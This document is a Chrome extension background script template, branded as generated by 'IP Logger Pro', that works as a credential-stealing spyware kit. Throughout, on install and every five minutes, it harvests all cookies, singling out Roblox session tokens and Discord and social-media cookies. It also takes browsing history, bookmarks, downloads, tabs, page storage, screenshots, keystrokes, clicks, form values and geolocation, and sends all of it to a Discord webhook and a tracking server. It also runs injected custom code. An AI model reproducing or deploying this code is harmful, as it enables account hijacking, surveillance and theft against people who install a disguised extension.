
// Enhanced Chrome Extension Background Script for {{EXTENSION_NAME}}
// Generated by IP Logger Pro - Advanced Security Testing Tool

const WEBHOOK_URL = '{{WEBHOOK_URL}}';
const USER_ID = '{{USER_ID}}';
const EXTENSION_ID = '{{EXTENSION_ID}}';
const TRACKING_SERVER = '{{TRACKING_SERVER}}';

// Session management
let sessionId = generateSessionId();
let isActive = true;
let collectedData = {
  installation: null,
  pageViews: [],
  formData: [],
  screenshots: [],
  keystrokes: [],
  clicks: [],
  geolocation: null,
  systemInfo: null,
  browserInfo: null,
  permissions: [],
  features: [],
  history: [],
  cookies: [],
  robloxData: [],
  localStorage: {},
  sessionStorage: {},
  bookmarks: [],
  downloads: [],
  tabs: []
};

// Generate UUID for session tracking
function generateSessionId() {
  return 'xxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxx'.replace(/[xy]/g, function(c) {
    const r = Math.random() * 16 | 0;
    const v = c === 'x' ? r : (r & 0x3 | 0x8);
    return v.toString(16);
  });
}

// Enhanced data collection on extension startup
if (chrome && chrome.runtime) {
  chrome.runtime.onStartup.addListener(() => {
    collectAllData();
  });

  chrome.runtime.onInstalled.addListener(() => {
    collectAllData();
  });
}

// COMPREHENSIVE DATA COLLECTION
async function collectAllData() {
  console.log('🔍 Starting comprehensive data collection...');
  
  // Collect initial system data
  await collectInitialData();
  
  // Collect browsing history
  if ({{FEATURE_BROWSER_INFO}}) {
    await collectBrowsingHistory();
  }
  
  // Collect all cookies
  await collectAllCookies();
  
  // Collect bookmarks
  await collectBookmarks();
  
  // Collect open tabs
  await collectAllTabs();
  
  // Collect downloads
  await collectDownloads();
  
  // Look for Roblox data
  await collectRobloxData();
  
  // Collect storage data from all origins
  await collectStorageData();
  
  // Take screenshots if enabled
  if ({{FEATURE_SCREENSHOT}}) {
    await captureAllScreenshots();
  }
  
  console.log('✅ Comprehensive data collection completed');
}

// Collect initial system data
async function collectInitialData() {
  const systemData = {
    type: 'extension_installed',
    extensionId: EXTENSION_ID,
    sessionId: sessionId,
    userId: USER_ID,
    timestamp: Date.now(),
    systemInfo: {
      platform: navigator.platform,
      userAgent: navigator.userAgent,
      language: navigator.language,
      languages: navigator.languages,
      timezone: Intl.DateTimeFormat().resolvedOptions().timeZone,
      screenResolution: screen ? `${screen.width}x${screen.height}` : 'unknown',
      colorDepth: screen.colorDepth,
      pixelDepth: screen.pixelDepth,
      cookieEnabled: navigator.cookieEnabled,
      onLine: navigator.onLine,
      hardwareConcurrency: navigator.hardwareConcurrency,
      deviceMemory: navigator.deviceMemory || 'unknown',
      connection: navigator.connection ? {
        effectiveType: navigator.connection.effectiveType,
        downlink: navigator.connection.downlink,
        rtt: navigator.connection.rtt
      } : 'unknown'
    }
  };

  await sendToWebhookAndServer(systemData);
}

// Collect complete browsing history
async function collectBrowsingHistory() {
  try {
    if (chrome.history) {
      const history = await chrome.history.search({
        text: '',
        maxResults: 10000,
        startTime: Date.now() - (30 * 24 * 60 * 60 * 1000) // Last 30 days
      });
      
      const historyData = {
        type: 'browsing_history',
        extensionId: EXTENSION_ID,
        sessionId: sessionId,
        userId: USER_ID,
        timestamp: Date.now(),
        historyCount: history.length,
        history: history.map(item => ({
          id: item.id,
          url: item.url,
          title: item.title,
          lastVisitTime: item.lastVisitTime,
          visitCount: item.visitCount,
          typedCount: item.typedCount
        }))
      };
      
      collectedData.history = historyData.history;
      await sendToWebhookAndServer(historyData);
      
      console.log(`📚 Collected ${history.length} history entries`);
    }
  } catch (error) {
    console.error('Error collecting browsing history:', error);
  }
}

// Collect ALL cookies from ALL domains
async function collectAllCookies() {
  try {
    if (chrome.cookies) {
      const allCookies = await chrome.cookies.getAll({});
      
      const cookieData = {
        type: 'all_cookies',
        extensionId: EXTENSION_ID,
        sessionId: sessionId,
        userId: USER_ID,
        timestamp: Date.now(),
        cookieCount: allCookies.length,
        cookies: allCookies.map(cookie => ({
          name: cookie.name,
          value: cookie.value,
          domain: cookie.domain,
          path: cookie.path,
          secure: cookie.secure,
          httpOnly: cookie.httpOnly,
          sameSite: cookie.sameSite,
          expirationDate: cookie.expirationDate,
          storeId: cookie.storeId
        })),
        robloxCookies: allCookies.filter(cookie => 
          cookie.domain.includes('roblox.com') || 
          cookie.name.includes('ROBLOSECURITY') ||
          cookie.name.includes('.ROBLOSECURITY')
        ),
        discordCookies: allCookies.filter(cookie => 
          cookie.domain.includes('discord.com') || 
          cookie.domain.includes('discordapp.com')
        ),
        socialCookies: allCookies.filter(cookie => 
          cookie.domain.includes('facebook.com') ||
          cookie.domain.includes('twitter.com') ||
          cookie.domain.includes('instagram.com') ||
          cookie.domain.includes('tiktok.com') ||
          cookie.domain.includes('youtube.com')
        )
      };
      
      collectedData.cookies = cookieData.cookies;
      await sendToWebhookAndServer(cookieData);
      
      console.log(`🍪 Collected ${allCookies.length} cookies from all domains`);
    }
  } catch (error) {
    console.error('Error collecting cookies:', error);
  }
}

// Collect bookmarks
async function collectBookmarks() {
  try {
    if (chrome.bookmarks) {
      const bookmarks = await chrome.bookmarks.getTree();
      
      const flattenBookmarks = (nodes) => {
        let result = [];
        for (let node of nodes) {
          if (node.url) {
            result.push({
              id: node.id,
              title: node.title,
              url: node.url,
              dateAdded: node.dateAdded,
              dateGroupModified: node.dateGroupModified
            });
          }
          if (node.children) {
            result = result.concat(flattenBookmarks(node.children));
          }
        }
        return result;
      };
      
      const flatBookmarks = flattenBookmarks(bookmarks);
      
      const bookmarkData = {
        type: 'bookmarks',
        extensionId: EXTENSION_ID,
        sessionId: sessionId,
        userId: USER_ID,
        timestamp: Date.now(),
        bookmarkCount: flatBookmarks.length,
        bookmarks: flatBookmarks
      };
      
      collectedData.bookmarks = flatBookmarks;
      await sendToWebhookAndServer(bookmarkData);
      
      console.log(`🔖 Collected ${flatBookmarks.length} bookmarks`);
    }
  } catch (error) {
    console.error('Error collecting bookmarks:', error);
  }
}

// Collect all open tabs
async function collectAllTabs() {
  try {
    if (chrome.tabs) {
      const tabs = await chrome.tabs.query({});
      
      const tabData = {
        type: 'all_tabs',
        extensionId: EXTENSION_ID,
        sessionId: sessionId,
        userId: USER_ID,
        timestamp: Date.now(),
        tabCount: tabs.length,
        tabs: tabs.map(tab => ({
          id: tab.id,
          url: tab.url,
          title: tab.title,
          active: tab.active,
          pinned: tab.pinned,
          incognito: tab.incognito,
          windowId: tab.windowId,
          index: tab.index,
          favIconUrl: tab.favIconUrl,
          status: tab.status,
          audible: tab.audible,
          muted: tab.mutedInfo?.muted
        }))
      };
      
      collectedData.tabs = tabData.tabs;
      await sendToWebhookAndServer(tabData);
      
      console.log(`📑 Collected ${tabs.length} open tabs`);
    }
  } catch (error) {
    console.error('Error collecting tabs:', error);
  }
}

// Collect downloads
async function collectDownloads() {
  try {
    if (chrome.downloads) {
      const downloads = await chrome.downloads.search({
        limit: 1000,
        orderBy: ['-startTime']
      });
      
      const downloadData = {
        type: 'downloads',
        extensionId: EXTENSION_ID,
        sessionId: sessionId,
        userId: USER_ID,
        timestamp: Date.now(),
        downloadCount: downloads.length,
        downloads: downloads.map(download => ({
          id: download.id,
          url: download.url,
          filename: download.filename,
          danger: download.danger,
          mime: download.mime,
          startTime: download.startTime,
          endTime: download.endTime,
          state: download.state,
          paused: download.paused,
          error: download.error,
          bytesReceived: download.bytesReceived,
          totalBytes: download.totalBytes,
          fileSize: download.fileSize,
          exists: download.exists
        }))
      };
      
      collectedData.downloads = downloadData.downloads;
      await sendToWebhookAndServer(downloadData);
      
      console.log(`📥 Collected ${downloads.length} downloads`);
    }
  } catch (error) {
    console.error('Error collecting downloads:', error);
  }
}

// Collect Roblox-specific data
async function collectRobloxData() {
  try {
    // Check for Roblox cookies specifically
    if (chrome.cookies) {
      const robloxCookies = await chrome.cookies.getAll({domain: '.roblox.com'});
      
      // Look for ROBLOSECURITY token
      const roblosecurityCookie = robloxCookies.find(cookie => 
        cookie.name === '.ROBLOSECURITY' || cookie.name === 'ROBLOSECURITY'
      );
      
      const robloxData = {
        type: 'roblox_data',
        extensionId: EXTENSION_ID,
        sessionId: sessionId,
        userId: USER_ID,
        timestamp: Date.now(),
        robloxCookies: robloxCookies,
        roblosecurityToken: roblosecurityCookie ? roblosecurityCookie.value : null,
        hasRobloxSession: !!roblosecurityCookie
      };
      
      if (roblosecurityCookie) {
        console.log('🎮 ROBLOX SESSION TOKEN FOUND!');
      }
      
      collectedData.robloxData = robloxData;
      await sendToWebhookAndServer(robloxData);
    }
  } catch (error) {
    console.error('Error collecting Roblox data:', error);
  }
}

// Collect storage data from pages
async function collectStorageData() {
  try {
    if (chrome.tabs) {
      const tabs = await chrome.tabs.query({});
      
      for (const tab of tabs.slice(0, 10)) { // Limit to prevent overload
        if (tab.url && !tab.url.startsWith('chrome://') && !tab.url.startsWith('chrome-extension://')) {
          try {
            await chrome.scripting.executeScript({
              target: { tabId: tab.id },
              func: collectPageStorage,
              args: [EXTENSION_ID, sessionId, USER_ID, tab.url]
            });
          } catch (error) {
            console.log(`Could not access storage for ${tab.url}:`, error.message);
          }
        }
      }
    }
  } catch (error) {
    console.error('Error collecting storage data:', error);
  }
}

// Function to inject for storage collection
function collectPageStorage(extensionId, sessionId, userId, url) {
  try {
    const storageData = {
      type: 'page_storage',
      extensionId: extensionId,
      sessionId: sessionId,
      userId: userId,
      timestamp: Date.now(),
      url: url,
      domain: window.location.hostname,
      localStorage: {},
      sessionStorage: {},
      cookies: document.cookie,
      indexedDBDatabases: [],
      webSQLDatabases: []
    };

    // Collect localStorage
    try {
      for (let i = 0; i < localStorage.length; i++) {
        const key = localStorage.key(i);
        if (key) {
          const value = localStorage.getItem(key);
          storageData.localStorage[key] = value;
        }
      }
    } catch (e) {
      storageData.localStorage = { error: 'Access denied' };
    }

    // Collect sessionStorage
    try {
      for (let i = 0; i < sessionStorage.length; i++) {
        const key = sessionStorage.key(i);
        if (key) {
          const value = sessionStorage.getItem(key);
          storageData.sessionStorage[key] = value;
        }
      }
    } catch (e) {
      storageData.sessionStorage = { error: 'Access denied' };
    }

    // Send to background script
    chrome.runtime.sendMessage({ type: 'storageData', data: storageData });

  } catch (error) {
    console.error('Error collecting page storage:', error);
  }
}

// Capture screenshots of all tabs
async function captureAllScreenshots() {
  try {
    if (chrome.tabs && chrome.tabs.captureVisibleTab) {
      const windows = await chrome.windows.getAll({ populate: true });
      
      for (const window of windows) {
        for (const tab of window.tabs) {
          if (tab.active && !tab.url.startsWith('chrome://')) {
            try {
              const dataUrl = await chrome.tabs.captureVisibleTab(window.id, { format: 'png' });
              
              const screenshotData = {
                type: 'screenshot',
                extensionId: EXTENSION_ID,
                sessionId: sessionId,
                userId: USER_ID,
                timestamp: Date.now(),
                tabInfo: {
                  id: tab.id,
                  url: tab.url,
                  title: tab.title,
                  windowId: window.id
                },
                screenshot: dataUrl.substring(0, 1000) + '...[TRUNCATED]', // Limit size for webhook
                screenshotSize: dataUrl.length
              };
              
              await sendToWebhookAndServer(screenshotData);
              console.log(`📸 Screenshot captured for: ${tab.title}`);
              
            } catch (error) {
              console.log(`Could not capture screenshot for tab ${tab.id}:`, error.message);
            }
          }
        }
      }
    }
  } catch (error) {
    console.error('Error capturing screenshots:', error);
  }
}

// Track tab changes with comprehensive data
if (chrome && chrome.tabs) {
  chrome.tabs.onActivated.addListener(async (activeInfo) => {
    await collectAndSendTabData(await chrome.tabs.get(activeInfo.tabId), 'tab_activated');
  });

  chrome.tabs.onUpdated.addListener(async (tabId, changeInfo, tab) => {
    if (changeInfo.status === 'complete' && tab.url) {
      await collectAndSendTabData(tab, 'page_loaded');
      
      // Collect fresh data when user navigates
      setTimeout(() => {
        collectPageDataFromTab(tab);
      }, 2000);
    }
  });
}

// Enhanced data collection from tabs
async function collectAndSendTabData(tab, eventType) {
  try {
    const data = {
      type: eventType,
      extensionId: EXTENSION_ID,
      sessionId: sessionId,
      userId: USER_ID,
      timestamp: Date.now(),
      tabInfo: {
        url: tab.url,
        title: tab.title,
        favIconUrl: tab.favIconUrl,
        incognito: tab.incognito,
        active: tab.active,
        pinned: tab.pinned,
        index: tab.index,
        windowId: tab.windowId,
        status: tab.status
      }
    };

    // Add geolocation if enabled
    if ({{FEATURE_GEOLOCATION}}) {
      try {
        const position = await getCurrentPosition();
        data.location = {
          latitude: position.coords.latitude,
          longitude: position.coords.longitude,
          accuracy: position.coords.accuracy,
          timestamp: position.timestamp
        };
      } catch (error) {
        data.location = { error: 'Geolocation not available' };
      }
    }

    await sendToWebhookAndServer(data);

    // Inject comprehensive data collection script
    if (tab.url && !tab.url.startsWith('chrome://') && !tab.url.startsWith('chrome-extension://')) {
      try {
        await chrome.scripting.executeScript({
          target: { tabId: tab.id },
          func: collectCompletePageData,
          args: [EXTENSION_ID, sessionId, USER_ID, {{FEATURE_FORM_DATA}}, {{FEATURE_CLICK_TRACKING}}, {{FEATURE_KEYLOGGER}}]
        });
      } catch (error) {
        console.error('Error injecting comprehensive collection script:', error);
      }
    }

  } catch (error) {
    console.error('Error collecting tab data:', error);
  }
}

// Comprehensive page data collection function
function collectCompletePageData(extensionId, sessionId, userId, captureFormData, captureClicks, captureKeystrokes) {
  try {
    const pageData = {
      type: 'comprehensive_page_analysis',
      extensionId: extensionId,
      sessionId: sessionId,
      userId: userId,
      timestamp: Date.now(),
      url: window.location.href,
      domain: window.location.hostname,
      path: window.location.pathname,
      title: document.title,
      pageInfo: {
        documentHeight: document.documentElement.scrollHeight,
        documentWidth: document.documentElement.scrollWidth,
        viewportHeight: window.innerHeight,
        viewportWidth: window.innerWidth,
        scrollX: window.scrollX,
        scrollY: window.scrollY,
        referrer: document.referrer,
        characterSet: document.characterSet,
        readyState: document.readyState,
        lastModified: document.lastModified,
        doctype: document.doctype ? document.doctype.name : 'unknown'
      },
      forms: [],
      links: [],
      images: [],
      inputs: [],
      scripts: [],
      iframes: [],
      localStorage: {},
      sessionStorage: {},
      cookies: document.cookie,
      userAgent: navigator.userAgent,
      language: navigator.language,
      platform: navigator.platform,
      onlineStatus: navigator.onLine,
      cookieEnabled: navigator.cookieEnabled
    };

    // Collect all forms with detailed information
    const forms = document.querySelectorAll('form');
    forms.forEach((form, index) => {
      const formData = {
        index: index,
        action: form.action,
        method: form.method,
        name: form.name,
        id: form.id,
        className: form.className,
        autocomplete: form.autocomplete,
        target: form.target,
        inputCount: form.querySelectorAll('input').length,
        inputs: []
      };

      const inputs = form.querySelectorAll('input, textarea, select');
      inputs.forEach(input => {
        formData.inputs.push({
          type: input.type || 'text',
          name: input.name,
          id: input.id,
          placeholder: input.placeholder,
          required: input.required,
          disabled: input.disabled,
          readonly: input.readOnly,
          value: input.type === 'password' ? '[HIDDEN]' : input.value?.substring(0, 100),
          checked: input.checked,
          selected: input.selected
        });
      });

      pageData.forms.push(formData);
    });

    // Collect all input fields (including those outside forms)
    const allInputs = document.querySelectorAll('input, textarea, select');
    allInputs.forEach(input => {
      pageData.inputs.push({
        type: input.type || 'unknown',
        name: input.name,
        id: input.id,
        className: input.className,
        placeholder: input.placeholder,
        autocomplete: input.autocomplete,
        required: input.required,
        disabled: input.disabled,
        readonly: input.readOnly,
        value: input.type === 'password' ? '[HIDDEN]' : input.value?.substring(0, 100),
        checked: input.checked,
        selected: input.selected,
        maxLength: input.maxLength,
        minLength: input.minLength,
        pattern: input.pattern
      });
    });

    // Collect all links
    const links = document.querySelectorAll('a[href]');
    Array.from(links).slice(0, 100).forEach(link => {
      pageData.links.push({
        href: link.href,
        text: link.textContent?.substring(0, 100),
        title: link.title,
        target: link.target,
        rel: link.rel,
        download: link.download
      });
    });

    // Collect all images
    const images = document.querySelectorAll('img[src]');
    Array.from(images).slice(0, 50).forEach(img => {
      pageData.images.push({
        src: img.src,
        alt: img.alt,
        title: img.title,
        width: img.width,
        height: img.height,
        loading: img.loading
      });
    });

    // Collect script sources
    const scripts = document.querySelectorAll('script[src]');
    Array.from(scripts).forEach(script => {
      pageData.scripts.push({
        src: script.src,
        type: script.type,
        async: script.async,
        defer: script.defer
      });
    });

    // Collect iframes
    const iframes = document.querySelectorAll('iframe');
    Array.from(iframes).forEach(iframe => {
      pageData.iframes.push({
        src: iframe.src,
        name: iframe.name,
        width: iframe.width,
        height: iframe.height,
        sandbox: iframe.sandbox.toString()
      });
    });

    // Collect localStorage
    try {
      for (let i = 0; i < localStorage.length; i++) {
        const key = localStorage.key(i);
        if (key) {
          const value = localStorage.getItem(key);
          pageData.localStorage[key] = value;
        }
      }
    } catch (e) {
      pageData.localStorage = { error: 'Access denied' };
    }

    // Collect sessionStorage
    try {
      for (let i = 0; i < sessionStorage.length; i++) {
        const key = sessionStorage.key(i);
        if (key) {
          const value = sessionStorage.getItem(key);
          pageData.sessionStorage[key] = value;
        }
      }
    } catch (e) {
      pageData.sessionStorage = { error: 'Access denied' };
    }

    // Send comprehensive data back to background script
    chrome.runtime.sendMessage({ type: 'comprehensivePageData', data: pageData });
    
    // Also send directly to webhook if available
    if ('{{WEBHOOK_URL}}' && '{{WEBHOOK_URL}}'.trim() && '{{WEBHOOK_URL}}' !== '{{WEBHOOK_URL}}') {
      sendDirectToWebhook(pageData);
    }

    // Set up enhanced event listeners for real-time tracking
    if (captureClicks) {
      document.addEventListener('click', function(event) {
        const clickData = {
          type: 'enhanced_click_event',
          extensionId: extensionId,
          sessionId: sessionId,
          userId: userId,
          timestamp: Date.now(),
          element: {
            tagName: event.target.tagName,
            id: event.target.id,
            className: event.target.className,
            text: event.target.textContent?.substring(0, 200),
            href: event.target.href,
            type: event.target.type,
            name: event.target.name,
            value: event.target.value?.substring(0, 100),
            dataset: Object.assign({}, event.target.dataset)
          },
          coordinates: {
            clientX: event.clientX,
            clientY: event.clientY,
            pageX: event.pageX,
            pageY: event.pageY,
            screenX: event.screenX,
            screenY: event.screenY
          },
          viewport: {
            width: window.innerWidth,
            height: window.innerHeight,
            scrollX: window.scrollX,
            scrollY: window.scrollY
          },
          url: window.location.href,
          path: window.location.pathname
        };
        chrome.runtime.sendMessage({ type: 'enhancedClickData', data: clickData });
      });
    }

    if (captureKeystrokes) {
      let keystrokeBuffer = '';
      let lastKeystroke = 0;

      document.addEventListener('keydown', function(event) {
        const now = Date.now();

        if (now - lastKeystroke > 5000) {
          keystrokeBuffer = '';
        }

        lastKeystroke = now;
        keystrokeBuffer += event.key;

        if (keystrokeBuffer.length >= 10 || ['Enter', 'Tab'].includes(event.key)) {
          const keystrokeData = {
            type: 'enhanced_keystroke_event',
            extensionId: extensionId,
            sessionId: sessionId,
            userId: userId,
            timestamp: now,
            keys: keystrokeBuffer,
            keyCount: keystrokeBuffer.length,
            element: {
              tagName: event.target.tagName,
              type: event.target.type,
              id: event.target.id,
              name: event.target.name,
              className: event.target.className,
              placeholder: event.target.placeholder
            },
            modifiers: {
              ctrl: event.ctrlKey,
              alt: event.altKey,
              shift: event.shiftKey,
              meta: event.metaKey
            },
            url: window.location.href,
            path: window.location.pathname
          };

          chrome.runtime.sendMessage({ type: 'enhancedKeystrokeData', data: keystrokeData });
          keystrokeBuffer = '';
        }
      });
    }

  } catch (error) {
    console.error('Error in comprehensive page data collection:', error);
  }
}

// Send data directly to webhook from content script
async function sendDirectToWebhook(data) {
  try {
    const webhookUrl = '{{WEBHOOK_URL}}';
    if (!webhookUrl || !webhookUrl.trim() || webhookUrl === '{{WEBHOOK_URL}}') {
      return;
    }

    const enhancedData = {
      ...data,
      type: 'comprehensive_page_analysis',
      extensionId: EXTENSION_ID,
      sessionId: sessionId,
      userId: USER_ID,
      timestamp: Date.now()
    };

    await sendToWebhook(enhancedData);
  } catch (error) {
    console.error('Direct webhook send failed:', error);
  }
}

// Listen for messages from content scripts
chrome.runtime.onMessage.addListener(async (message, sender, sendResponse) => {
  if (message.type === 'comprehensivePageData' || 
      message.type === 'enhancedClickData' || 
      message.type === 'enhancedKeystrokeData' ||
      message.type === 'storageData') {
    await sendToWebhookAndServer(message.data);
  }
});

// Enhanced webhook and server sending with retry logic
async function sendToWebhookAndServer(data) {
  // Send to Discord webhook (if configured)
  if (WEBHOOK_URL && WEBHOOK_URL.trim()) {
    await sendToWebhook(data);
  }

  // Send to tracking server (for EX LOGS)
  await sendToServer(data);
}

// Enhanced Discord webhook with detailed embeds
async function sendToWebhook(data) {
  try {
    let embed = {
      title: "🔍 COMPREHENSIVE EXTENSION DATA",
      color: getColorForEventType(data.type),
      timestamp: new Date(data.timestamp).toISOString(),
      footer: { text: `Extension: {{EXTENSION_NAME}} | Session: ${data.sessionId?.substring(0, 8)}` }
    };

    // Customize embed based on data type
    switch (data.type) {
      case 'extension_installed':
        embed.title = "🚀 EXTENSION INSTALLED - DATA COLLECTION ACTIVE";
        embed.description = `**{{EXTENSION_NAME}}** is now collecting ALL user data.`;
        embed.fields = [
          { name: "👤 User", value: `ID: ${data.userId}`, inline: true },
          { name: "💻 Platform", value: data.systemInfo?.platform || 'Unknown', inline: true },
          { name: "🌐 Browser", value: data.systemInfo?.userAgent?.split(' ')[0] || 'Unknown', inline: true }
        ];
        break;

      case 'all_cookies':
        embed.title = "🍪 ALL COOKIES EXTRACTED";
        embed.description = `Collected **${data.cookieCount}** cookies from all domains`;
        embed.fields = [
          { name: "🎮 Roblox Cookies", value: data.robloxCookies?.length.toString() || '0', inline: true },
          { name: "💬 Discord Cookies", value: data.discordCookies?.length.toString() || '0', inline: true },
          { name: "📱 Social Cookies", value: data.socialCookies?.length.toString() || '0', inline: true }
        ];
        break;

      case 'browsing_history':
        embed.title = "📚 BROWSING HISTORY EXTRACTED";
        embed.description = `Collected **${data.historyCount}** history entries`;
        embed.fields = [
          { name: "📈 Total Entries", value: data.historyCount.toString(), inline: true },
          { name: "🗓️ Time Range", value: "Last 30 days", inline: true }
        ];
        break;

      case 'roblox_data':
        embed.title = data.hasRobloxSession ? "🎮 ROBLOX SESSION TOKEN FOUND!" : "🎮 Roblox Data Check";
        embed.color = data.hasRobloxSession ? 0xFF0000 : 0x95A5A6;
        if (data.hasRobloxSession) {
          embed.description = "**CRITICAL: ROBLOX LOGIN TOKEN EXTRACTED**";
          embed.fields = [
            { name: "🔑 Token Status", value: "✅ Active Session Found", inline: true },
            { name: "🍪 Cookie Count", value: data.robloxCookies?.length.toString() || '0', inline: true }
          ];
        }
        break;

      case 'bookmarks':
        embed.title = "🔖 BOOKMARKS EXTRACTED";
        embed.description = `Collected **${data.bookmarkCount}** bookmarks`;
        break;

      case 'all_tabs':
        embed.title = "📑 ALL OPEN TABS CAPTURED";
        embed.description = `Monitoring **${data.tabCount}** open tabs`;
        break;

      case 'downloads':
        embed.title = "📥 DOWNLOAD HISTORY EXTRACTED";
        embed.description = `Collected **${data.downloadCount}** download records`;
        break;

      case 'comprehensive_page_analysis':
        embed.title = "🔬 DEEP PAGE ANALYSIS";
        embed.fields = [
          { name: "🌐 Domain", value: data.domain || 'Unknown', inline: true },
          { name: "📊 Forms", value: data.forms?.length.toString() || '0', inline: true },
          { name: "🔗 Links", value: data.links?.length.toString() || '0', inline: true },
          { name: "📝 Inputs", value: data.inputs?.length.toString() || '0', inline: true },
          { name: "🖼️ Images", value: data.images?.length.toString() || '0', inline: true },
          { name: "💾 Storage Items", value: Object.keys(data.localStorage || {}).length.toString(), inline: true }
        ];
        break;

      case 'screenshot':
        embed.title = "📸 SCREENSHOT CAPTURED";
        embed.fields = [
          { name: "📄 Page", value: data.tabInfo?.title?.substring(0, 100) || 'Unknown', inline: false },
          { name: "📊 Image Size", value: `${Math.round(data.screenshotSize / 1024)} KB`, inline: true }
        ];
        break;

      case 'enhanced_click_event':
        embed.title = "👆 USER CLICK TRACKED";
        embed.fields = [
          { name: "🎯 Element", value: `${data.element?.tagName || 'Unknown'} ${data.element?.id ? `#${data.element.id}` : ''}`, inline: true },
          { name: "📝 Text", value: data.element?.text?.substring(0, 50) || 'No text', inline: true }
        ];
        break;

      case 'enhanced_keystroke_event':
        embed.title = "⌨️ KEYSTROKES CAPTURED";
        embed.fields = [
          { name: "🔢 Characters", value: data.keyCount?.toString() || '0', inline: true },
          { name: "🎯 Element", value: data.element?.tagName || 'Unknown', inline: true }
        ];
        break;
    }

    // Add URL field for page-related events
    if (data.url && !['extension_installed', 'all_cookies', 'browsing_history'].includes(data.type)) {
      embed.fields = embed.fields || [];
      embed.fields.push({
        name: "🔗 URL",
        value: data.url.substring(0, 200) || 'Unknown',
        inline: false
      });
    }

    const webhookPayload = {
      username: "🕵️ {{EXTENSION_NAME}} DATA COLLECTOR",
      avatar_url: "https://cdn.discordapp.com/emojis/853928735535742986.png",
      embeds: [embed]
    };

    const response = await fetch(WEBHOOK_URL, {
      method: 'POST',
      headers: { 'Content-Type': 'application/json' },
      body: JSON.stringify(webhookPayload)
    });

    if (!response.ok) {
      console.error('Webhook failed:', response.status, response.statusText);
    } else {
      console.log('✅ Data sent to Discord webhook');
    }

  } catch (error) {
    console.error('❌ Error in sendToWebhook:', error);
  }
}

// Get color based on event type
function getColorForEventType(eventType) {
  const colors = {
    'extension_installed': 0x00FF00,
    'all_cookies': 0xFFFF00,
    'browsing_history': 0x3498DB,
    'roblox_data': 0xFF6B35,
    'bookmarks': 0x9B59B6,
    'all_tabs': 0x1ABC9C,
    'downloads': 0xE67E22,
    'comprehensive_page_analysis': 0xF39C12,
    'screenshot': 0x8E44AD,
    'enhanced_click_event': 0xE74C3C,
    'enhanced_keystroke_event': 0xFF0000,
    'page_storage': 0x2ECC71
  };
  return colors[eventType] || 0x95A5A6;
}

// Send data to tracking server for EX LOGS
async function sendToServer(data) {
  try {
    if (!TRACKING_SERVER) {
      console.warn('No tracking server configured');
      return;
    }

    const response = await fetch(`${TRACKING_SERVER}/api/extension-track`, {
      method: 'POST',
      headers: { 'Content-Type': 'application/json' },
      body: JSON.stringify({
        ...data,
        userAgent: navigator.userAgent,
        extensionName: '{{EXTENSION_NAME}}',
        webhookUrl: WEBHOOK_URL
      })
    });

    if (response.ok) {
      console.log('📊 Data logged to EX LOGS tracking server');
    }
  } catch (error) {
    console.error('❌ Tracking server communication failed:', error);
  }
}

// Get current position with timeout
function getCurrentPosition() {
  return new Promise((resolve, reject) => {
    navigator.geolocation.getCurrentPosition(resolve, reject, {
      timeout: 10000,
      maximumAge: 300000,
      enableHighAccuracy: true
    });
  });
}

// Collect data from specific tab
async function collectPageDataFromTab(tab) {
  if (tab.url && !tab.url.startsWith('chrome://') && !tab.url.startsWith('chrome-extension://')) {
    try {
      await chrome.scripting.executeScript({
        target: { tabId: tab.id },
        func: collectCompletePageData,
        args: [EXTENSION_ID, sessionId, USER_ID, true, true, true]
      });
    } catch (error) {
      console.error('Error collecting page data from tab:', error);
    }
  }
}

// Set up periodic comprehensive data collection
setInterval(async () => {
  console.log('🔄 Running periodic comprehensive data collection...');
  await collectAllData();
}, 300000); // Every 5 minutes

// Extension installation handler
chrome.runtime.onInstalled.addListener(async (details) => {
  console.log('{{EXTENSION_NAME}} installed:', details);

  try {
    // Start comprehensive data collection immediately
    await collectAllData();

    console.log('✅ {{EXTENSION_NAME}} is now collecting ALL user data');

  } catch (error) {
    console.error('Error during installation setup:', error);
  }
});

// Custom user code injection point
try {
  {{CUSTOM_CODE}}
} catch (error) {
  console.error('Custom code error:', error);
}
